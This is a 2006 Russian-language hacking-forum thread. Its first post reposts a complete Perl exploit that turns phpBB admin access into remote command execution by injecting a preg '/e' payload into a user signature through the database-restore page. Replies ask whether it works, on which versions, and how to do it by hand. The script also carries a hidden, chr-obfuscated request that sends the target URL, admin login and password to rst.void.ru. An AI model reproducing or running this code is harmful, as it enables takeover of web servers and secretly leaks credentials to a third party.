ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

phpBB admin =>2.0.19 exec exploit
  #1  
Старый 10.04.2006, 22:45
Аватар для 0verfe1
0verfe1
Новичок
Регистрация: 28.08.2005
Сообщений: 27
Провел на форуме:
63939

Репутация: -4
По умолчанию phpBB admin =>2.0.19 exec exploit

зашел на rst.void.ru сегодня и увидел это:
пока не тестировал,
Код:
#!/usr/bin/perl

## r57phpbba2e2.pl - phpBB admin 2 exec exploit 
## version 2 (based on user_sig_bbcode_uid bug)
## tested on 2.0.12 , 2.0.13 , 2.0.19
## --------------------------------------------
## screen
## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password
## Command for execute or 'exit' for exit # id
## uid=80(www) gid=80(www) groups=80(www)
## Command for execute or 'exit' for exit # exit 
## --------------------------------------------
## *** surprise included ;)
## 20/02/06 
## 1dt.w0lf
## RST/GHC (http://rst.void.ru , http://ghc.ru)

use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;

getopts("u:L:P:i:p:o:");

$url      = $opt_u;
$login    = $opt_L;
$password = $opt_P;
$id       = $opt_i || 2;
$prefix   = $opt_p || 'phpbb_';
$proxy    = $opt_o;

if(!$url || !$login || !$password){&usage;}

$|++;

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$xpl->proxy('http'=>'http://'.$proxy) if $proxy;
$ids = 'IDS:r57 phpBB2 exploit a2e220022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix;
 $res = $xpl->post($url.'login.php',
 [
 "username"   => "$login",
 "password"   => "$password",
 "autologin"  => "on",
 "admin"      => "1",
 "login"      => "Log in",
 ],"User-Agent" => "$ids");
 $cookie_jar->extract_cookies($res);
 if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }   
 $xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?ids='.$ids);
 while ()
 {
    print "Command for execute or 'exit' for exit # ";
    while(<STDIN>)
     {
        $cmd=$_;
        chomp($cmd);
        exit() if ($cmd eq 'exit');
        last;
     }
    &run($cmd);
 }
 
sub run($)
 {   
 $sql   = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE user_id=".$id.";";
 &phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql);   
 $res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids");
 @result = split(/\n/,$res->content);
 $data = '';
 $on = $start = $end = 0;
 for (@result)
  {
    if (/_END_/) { $end = 1; last; }
    if ($on) { $data .= $_."\n"; }
    if (/_START_/) { $on = 1; $start = 1; } 
  }
 if($start&&$end) { print $data."\r\n"; } 
 }
 
sub phpbb_sql_query($$){
$res = $xpl->post("$_[0]", 
Content_type => 'form-data',
Content      => [ 
                perform       => 'restore',
                restore_start => 'Start Restore',
                backup_file   => [ 
                                   undef,
                                   '0wneeeeedddd', 
                                   Content_type => 'text/plain',
                                   Content => "$_[1]", 
                                 ],
                ]
,"User-Agent" => "$ids");
} 

sub usage()
 {
 &about();
 print "\r\n Usage: r57phpbba2e2.pl [OPTIONS]\r\n\r\n";
 print " Options:\r\n";
 print " -u [URL] - path to forum e.g. http://site/forum/\r\n";
 print " -L [login] - admin login\r\n";
 print " -P [password] - admin password\r\n";
 print " -i [id] - admin id (optional, default 2)\r\n";
 print " -p [prefix] - table prefix (optional, default phpbb_)\r\n";
 print " -o [host:port] - proxy (optional)\r\n";
 exit();
 }
 
sub about()
  { 
  print "\\=-----------------------------------=/\r\n";
  print "| phpBB admin2exec exploit by RST/GHC |\r\n";
  print "| version 2 (user_sig_bbcode_uid)     |\r\n";
  print "/=-----------------------------------=\\\r\n";
  return 'http://rst.void.ru';
  }
 
Ответить с цитированием

  #2  
Старый 10.04.2006, 23:20
Аватар для vectorg
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

хмм
Цитата:
## *** surprise included
что бы это значило +))
 
Ответить с цитированием

  #3  
Старый 10.04.2006, 23:36
Аватар для Go0o$E
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию

Наверное как всегда надо его подправить +))
__________________

Завтра будет.Лучше.
 
Ответить с цитированием

  #4  
Старый 10.04.2006, 23:54
Аватар для liauliau
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию

Кто ещё проверял? у меня не работает...
 
Ответить с цитированием

  #5  
Старый 11.04.2006, 00:31
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

2 0verfe1 - А что значит =>2.0.19 ? RST что исходники будущих версий форума где-то надыбали? А вообще возникли вопросы, хотелось бы получить ответы:
1) $sid = $1. Что значит переменная 1? Такое имя возможно?
2) $cmd=$_; Это что за констракт такой забавный?
3) '(.+)/e\0' Важно ли здесь чтобы нуль-байт был %00? Или оно все-равно в итоге таким как в сплоите станет?
 
Ответить с цитированием

  #6  
Старый 11.04.2006, 00:33
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

Кстати, просьба тем, кто удачно заюзал сплойт, отписаться сюда - на каких версиях, кроме указанных в сплойте, он работает.
P. S. По-моему, ограничений на сплойт нет, да? В плане, модов, версий и т. п.
 
Ответить с цитированием

  #7  
Старый 11.04.2006, 00:40
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

ничего нового..старый добрый нулевой байт а подписи профайла..все это можно и ручками проделать имея доступ к админке форума,
 
Ответить с цитированием

  #8  
Старый 11.04.2006, 00:48
Аватар для andre
andre
Новичок
Регистрация: 26.03.2006
Сообщений: 22
Провел на форуме:
119833

Репутация: 5
По умолчанию

что с помощью него можно сделать.
для сплоита нужен пас админа, что-то не понимаю для чего он тогда предназначен?
 
Ответить с цитированием

  #9  
Старый 11.04.2006, 14:53
Аватар для Go0o$E
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию

andre: Он команды выполняет
__________________

Завтра будет.Лучше.
 
Ответить с цитированием

  #10  
Старый 11.04.2006, 15:16
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

2 Grrl Мог бы отписаться на форуме как это ручками организовать можно? По-моему, исходники страницы в профайле редить надо, а как?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit TANZWUT Форумы 4 10.06.2008 20:18
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Форумы 11 01.02.2007 12:21
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Форумы 21 13.01.2007 23:01
phpBB 2.0.19 Exploit m0nzt3r Форумы 41 29.06.2006 16:05
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit Rebz Уязвимости 4 28.02.2006 19:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ